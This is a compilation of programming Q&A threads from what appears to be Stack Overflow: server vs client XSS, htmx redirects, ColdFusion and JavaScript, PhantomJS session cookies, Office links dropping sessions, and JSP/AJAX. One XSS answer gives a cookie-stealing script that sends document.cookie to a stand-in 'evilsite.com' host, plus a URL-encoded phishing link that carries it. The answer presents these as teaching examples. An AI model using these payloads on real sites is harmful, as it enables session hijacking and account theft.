What is a clear explanation of the difference between server XSS and client XSS?
I read the explanation on the site of OWASP, but it wasn't very clear for me. I know the reflected, stored en DOM types.
First, to set the scene for anyone else finding the question we have the text from the OWASP Types of Cross-Site Scripting page:
Server XSS
Server XSS occurs when untrusted user supplied data is included in an HTML response generated by the server. The source of
this data could be from the request, or from a stored location. As
such, you can have both Reflected Server XSS and Stored Server XSS.
In this case, the entire vulnerability is in server-side code, and the
browser is simply rendering the response and executing any valid
script embedded in it.
Client XSS
Client XSS occurs when untrusted user supplied data is used to update
the DOM with an unsafe JavaScript call. A JavaScript call is
considered unsafe if it can be used to introduce valid JavaScript into
the DOM. This source of this data could be from the DOM, or it could
have been sent by the server (via an AJAX call, or a page load). The
ultimate source of the data could have been from a request, or from a
stored location on the client or the server. As such, you can have
both Reflected Client XSS and Stored Client XSS.
This redefines XSS into two categories: Server and Client.
Server XSS means that the data comes directly from the server onto the page. For example, the data containing the unsanitized text is from the HTTP response that made up the vulnerable page.
Client XSS means that the data comes from JavaScript which has manipulated the page. So it is JavaScript that has added the unsanitized text to the page, rather than it being in the page at that location when it was first loaded in the browser.
Example of Server XSS
An ASP (or ASP.NET) page outputs a variable to the HTML page when generated, which is taken directly from the database:
<%=firstName %>
As firstName is not HTML encoded, a malicious user may have entered their first name as <script>alert('foo')</script>, causing a successful XSS attack.
Another example is the output of variables processed through the server without prior storage:
<%=Request.Form["FirstName"] %>
Example of Client XSS*
<script type="text/javascript">
function loadXMLDoc() {
var xmlhttp;
if (window.XMLHttpRequest) {
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
} else {
// code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 ) {
if(xmlhttp.status == 200){
document.getElementById("myDiv").innerHTML = xmlhttp.responseText;
}
else if(xmlhttp.status == 400) {
alert('There was an error 400')
}
else {
alert('something else other than 200 was returned')
}
}
}
xmlhttp.open("GET", "get_first_name.aspx", true);
xmlhttp.send();
}
</script>
Note that our get_first_name.aspx method does no encoding of the returned data, as it is a web service method that is also used by other systems (content-type is set to text/plain). Our JavaScript code sets innerHTML to this value so it is vulnerable to Client XSS. To avoid Client XSS in this instance, innerText should be used instead of innerHTML which will not result in interpretation of HTML characters. It is even better to use textContent as Firefox is not compatible with the non-standard innerText property.
* code adapted from this answer.
SilverlightFox has explained everything well, but I would like to add some examples.
Server XSS:
So lets say, that we found a vulnerable website, which doesn't properly handle the comment box text. We create a new comment and type in:
<p>This picture gives me chills</p>
<script>img=new Image();img.src="http://www.evilsite.com/cookie_steal.php?cookie="+document.cookie+"&url="+document.domain;</script>
We also create a PHP script that will save both GET values into a text file, and we can then proceed to steal user's cookies. The cookies get send EACH TIME someone loads the injected comment, and doesn't even need to see it coming (only sees "This picture gives me chills" comment).
Client XSS:
Let's say we found a website, that has vulnerable search bar, and parses HTML we search for into the page. To test that, simply search for something like:
<font color="red">Test</font>
If the search results shows the word "Test" in red color, the search engine is vulnerable for client XSS. Attacker then uses personal messages/emails of users of the website, to send the users innocent looking url. This could look like:
Hello, I recently had a problem with this website's search engine.
Please click on following link:
http://www.vulnerable-site.com/search.php?q=%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%73%69%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%5F%73%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2B%22%26%75%72%6C%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%3B%3C%2F%73%63%72%69%70%74%3E
When anyone clicks the link, the code is launched from their browsers (its encoded into URL chars, because else users may suspect the script in the website url), doing the same thing as script above -> stealing the cookies of the user.
However, if you use this without owner of the website's approval, you're breaking the law.
Keep that in mind, and use my examples to fix XSS holes on your website.
Related
In the past I used the Post/Redirect/Get pattern:
the html for was submitted to the server via POST
the server processed the data.
if everything was ok, the server responsed with a http 302 (redirect
the client redirected the page to the new location.
Is this still needed if you submit html fragments via htmx?
By and large no, you will not need to implement the PRG pattern.
Since htmx uses AJAX for most interactions, there is no request sitting in the browser history, and hitting refresh will not re-submit a POST (or DELETE or whatever).
That said, htmx trys to be compatible with the PRG pattern, and tries to update the URL if a redirect occurs by detecting the :
https://github.com/bigskysoftware/htmx/blob/1d4c79490e491813ffb780354ec5df6d080b1e09/src/htmx.js#L2146
https://github.com/bigskysoftware/htmx/blob/1d4c79490e491813ffb780354ec5df6d080b1e09/src/htmx.js#L1851
If you do something like inline editing:
https://htmx.org/examples/click-to-edit/
The point becomes moot to a large extent, since you can have the edit UI at the same URL as the view URL.
Can I use ColdFusion tags in JavaScript? For example:
<script language="javascript" type="text/javascript">
function validateUser() {
var userName = document.getElementById("username");
<CFQUERY DATASOURCE="mydatasourcename" NAME="getUser">
select USER_ID,COUNT(*) from user u
where u.firstname=userName;
</CFQUERY>
<cfif getUser.recordCount EQ 0>
<!--- Show eroor message --->
<cfelse>
<!--- Assign userId to hidden field --->
document.getElementById("userid").value=#USER_ID#
</cfif>
}
</script>
<input type='textbox' name='username' id='username' onblur=validateUser()/>
<input type='hidden' name='userid' id='userid'/>
When the end user enters their username, I would like to check in a database if this username exists or not. If it exists, I have to keep the userid in the hiddenfield or else throw an error.
Am I doing this correctly? If it is wrong, could you suggest the correct way?
Long version: http://blog.adamcameron.me/2012/10/the-coldfusion-requestresponse-process.html
Short version: no, you're not doing it right.
Mid-sized StackOverflow-friendly version: CFML code runs on the server side of a request; JavaScript runs on the client browser. And to be clear: the ColdFusion server never communicates with the browser directly at all: there's a web server in between. The client browser requests a file, the web server is configured to pass .cfm requests to the ColdFusion server, and it runs its code, returning the resulting string (eg: an HTML web page) to the web server which then returns that to the browser. That HTML might include JavaScript (inline or as external requests) which the browser will then execute.
Hopefully from that you can see that there's no direct interaction between server-side code and client-side code.
You have two facilities at your disposal to get the two communicating asynchronously though. Firstly: CFML code writes out text, but that text can be JS which the browser then runs when it finally receives it. Something like:
<cfset msg ="G'day world">
<script>alert("<cfoutput>#msg#</cfoutput>");</script>
Once the CFML server has processed that, what gets sent back to the browser is:
<script>alert("G'day world");</script>
In this way server-side code data can be used in client-side process if the server-side code "writes out" the data as part of its response. The example above is very trivial and not a "good practice" way of going about this, but it demonstrates the technique.
If you need to use JS code on the client to communicate back with the server, your only (real) recourse is to make an AJAX request back to the server to pass it client-side information for further server-side processing and for the server to respond with something. It is outwith the scope of your question to explain how best to do this, but there is a tonne of information out there to do this.
CFML provides some "wizards" to write HTML and JS out for you to facilitate this, but on the whole this is a bad approach to achieving this end, so I will not recommend it. However I will point you to a project which offers HTML/JS/CSS solutions to the inbuilt CFML wizardry: https://github.com/cfjedimaster/ColdFusion-UI-the-Right-Way
Back to the short answer: no, you cannot do what you are setting out to do for very good reasons, but if you revise your approach, you can achieve the ends that you want.
What you need to look at is passing the form fields back to the server via AJAX (jQuery makes this very easy), and run your <cfquery> code in a separate request.
If you read that blog article I mention from the outset (discloure: I wrote it, but I wrote it specifically for situations like this), then you'll understand why.
If you get stuck when working on part of your solution: raise another question more focused on whatever part you are stuck on.
I found an interesting issue when attempting to login using PhantomJS. I'm at a loss as to why it's actually occurring.
Basically you start up a remote debugger like so:
/usr/local/bin/phantomjs --web-security=no --remote-debugger-port=13379 --remote-debugger-autorun=yes /tmp/test.js
Within the remote debugger:
> location.href = "https://www.mysite.com/login"
> $('input[name="username_or_email"]').val('blah#email.com')
> $('input[name="password"]').val('wrongpassword')
> $('button[type="submit"]').submit()
Doing this in Chrome will give me the correct "wrong password" message after the XHR request, whereas using phantomjs gives me a generic error as no cookie is sent with phantomjs (I examined the headers).
I'm quite confused on why phantomjs doesn't send the cookie with the POST request. Does anyone know how we can get phantomjs to send the cookie with ALL requests as it should? Setting a cookie-file doesn't make any difference either.
Ok, this seems to be something related with session cookies and not regular cookies.
Heres a huge thread on the developer in charge of the cookies feature of phantomjs and some guys with the same issue as yours.
https://groups.google.com/forum/#!msg/phantomjs/2UbPkIibnDg/JLV9jBKxhIQJ
If you dont want to skirm through the entire file, basically:
Phantomjs behaves like a regular browser, and it deletes all session cookies when browser closes, in your case, when your script execution ends.
So, even if you set the --cookies-file=/path/to/cookies.txt option you will only store regular cookies on it, for subsecuent executions.
There are two possible approaches for you. One, is to make all requests within the same script, or the other is to store and restore the cookies manually.
On the thread there are a couple of functions that you can use to do this.
function saveCookies(sessionCookieFile, page) {
var fs = require("fs");
fs.write(sessionCookieFile, JSON.stringify(page.cookies));
}
function restoreCookies(sessionCookieFile, page) {
var fs = require("fs");
var cookies = fs.read(sessionCookieFile);
page.cookies = JSON.parse(cookies);
}
var page = require('webpage').create();
And, if everything fails...
You could download source code and recopile phantomjs
You will need to edit src/cookiejar.cpp and remove or comment purgeSessionCookies();
Hope, this helps.
Been trying to figure this out for an hour now and I'm stymied. Simple site that allows employees to register. Typically the employer has a company wide u/p for all employees to use to access the registration page, but client also wanted a way to give employee a link to auto-login to register.
Simple enough - created a page "r.cfm" that looks for URL.emid (encrypted employer ID) and URL.h (5 character hash as a check based on the decrypted employer ID). A full URL may look something like this:
https://www.domain.com/r.cfm?emid=22EBCA&h=F5DEA
r.cfm makes sure the correct URL vars are there, decrypts the emid, compares the check value and if all is correct sets some session vars as such:
<cflock scope="session" type="exclusive" timeout="10">
<cfset SESSION.LOGGEDIN = TRUE/>
<cfset SESSION.LOGIN.EMPLOYEE.COID = DecryptString(url.emid)/>
</cflock>
I think use CFHEADER 302 and CFHEADER location to send them onto the next page. Here's where it gets weird. On the next page I setup some test code to e-mail me a dump of the session.
If clicked directly in MS Word I get to the 2nd page (the one from the cfheader redirect - employeeRegister.cfm) and I get not one - but two e-mail dumps of the session. The first one shows logged in as true, but the 2nd one shows it as false with a different jsessionid.
If I take the exact same link, paste it into my browser, it works as expected - one e-mail with a session dump showing that session.logged in true.
There is nothing on employeeRegister.cfm that would initiate a page reload. It actually doesn't even check the session.logged in var until the following page. employeeRegister.cfm is simply terms and conditions and a submit button to go to the next page, which is where the session vars are read and checked. It is literally a div with text and then a form tag with accept / decline.
This is because the office product initially tries to act as the browser (to test for web authoring) instead of handing off control to the browser right away. By the time the browser gets control of the url a valid session doesn't exist because office isn't going to share cookies. Without a valid session cookie you end up getting logged out during subsequent redirects or navigation of the site in question.
These MS KB article should help you solve the problem.
http://support.microsoft.com/kb/899927 <- mostly
http://support.microsoft.com/kb/218153 <- more info about Office links
I'm in a position to get a value from JavaScript, which uses Raphaeljs and send it to a Servlet/JSP page for Display & DB related work. Kindly assist me for that.
You are going to have to do AJAX for this one. Be sure to load jQuery so is easy to do it.
Simply collect the var value and send it to the JSP using .get or .post. Then you can add your validation in the JSP for the value sent and do whatever you want with it.
Hope this helps!
Jorge C.
As far as i understand this is not Raphael related.
What you need to make sure is, that you understand the difference between client and server side. Javascript runs client side (given we're not talking about a server side application written with JS/nodejs) in the browser while JSPs are executed on the server
If you collect values via JS and want the server to process it then you you can either send it to the server with an AJAX request (which wont reload the page) or manipulate a form and submit it (which will be a GET or a POST request then and will reload the whole page).
On the server you can accept the values and process them and then render the response.
For Ajax request you could look at jQuery.